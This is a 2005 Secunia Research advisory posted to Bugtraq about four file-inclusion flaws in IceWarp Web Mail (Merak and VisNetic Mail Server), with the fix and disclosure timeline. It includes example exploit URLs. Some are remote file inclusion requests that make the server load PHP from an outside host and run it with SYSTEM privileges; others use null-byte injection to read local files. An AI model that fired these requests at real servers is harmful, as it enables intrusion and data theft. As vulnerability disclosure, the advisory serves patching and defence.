
Date: Tue, 27 Dec 2005 16:21:04 +0100
From: Secunia Research <vuln@...unia.com>
To: vuln@...unia.com
Cc: bugtraq@...urityfocus.com
Subject: Secunia Research: IceWarp Web Mail Multiple File Inclusion
	Vulnerabilities


====================================================================== 

                     Secunia Research 27/12/2005

    - IceWarp Web Mail Multiple File Inclusion Vulnerabilities  -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* Merak Mail Server version 8.3.0.r.
* VisNetic Mail Server version 8.3.0 build 1.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Highly Critical
Impact: System access
        Exposure of sensitive information
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in IceWarp Web 
Mail, which can be exploited by malicious users and by malicious
people to disclose potentially sensitive information and to compromise
a vulnerable system.

1) The webmail and webadmin services run with PHP configured with
"register_global" enabled. The "language" and "lang_settings"
variables in "/accounts/inc/include.php" and "/admin/inc/include.php"
are not properly initialised when the scripts are accessed directly.
This makes it possible to overwrite the variables to cause the scripts
to include arbitrary PHP scripts from local and remote sources.

Example:
http://[host]:32000/accounts/inc/include.php?
language=0&lang_settings[0][1]=http://[host]/
http://[host]:32000/admin/inc/include.php?
language=0&lang_settings[0][1]=http://[host]/

Successful exploitation allows execution of arbitrary PHP code on a
vulnerable server with SYSTEM privileges without requiring
authentication.


2) Input passed to the "lang" parameter in "/dir/include.html" isn't
properly validated before being used to include files. This can be
exploited to include arbitrary files from local sources.

Example:
http://[host]:32000/dir/include.html?lang=[file]%00

Successful exploitation allows disclosure of arbitrary files on a
vulnerable server without requiring authentication.


3) Input passed to the "language" parameter in "/mail/settings.html"
isn't properly validated before being saved to the database. This
can be exploited in conjunction with overwrite of the "lang_settings"
variable, to include arbitrary PHP scripts from local and remote
sources.

Example:
http://[host]:32000/mail/settings.html?
id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?
id=[current_id]&lang_settings[TEST]=test;http://[host]/;

Successful exploitation allows execution of arbitrary PHP scripts on
a vulnerable server with SYSTEM privileges but requires a valid logon.


4) The "default_layout" and "layout_settings" variables are not
properly initialised when "/mail/include.html" encounters a
HTTP_USER_AGENT string that it does not recognise. This can be
exploited in conjunction with overwrite of the "default_layout" and
"layout_settings" variables to disclose the content of local files.

Example (using non-IE/Mozilla/Firefox browser):
http://[host]:32000/mail/index.html?/mail/index.html?
default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2

Successful exploitation allows disclosure of arbitrary files on a
vulnerable server without requiring authentication.

====================================================================== 
4) Solution 

Merak Mail Server:
Update to version 8.3.5.r.

VisNetic Mail Server:
Update to version 8.3.5.

====================================================================== 
5) Time Table 

07/12/2005 - Initial vendor notification.
07/12/2005 - Initial vendor reply.
27/12/2005 - Public disclosure.

====================================================================== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

====================================================================== 
7) References

No other references available.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-62/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



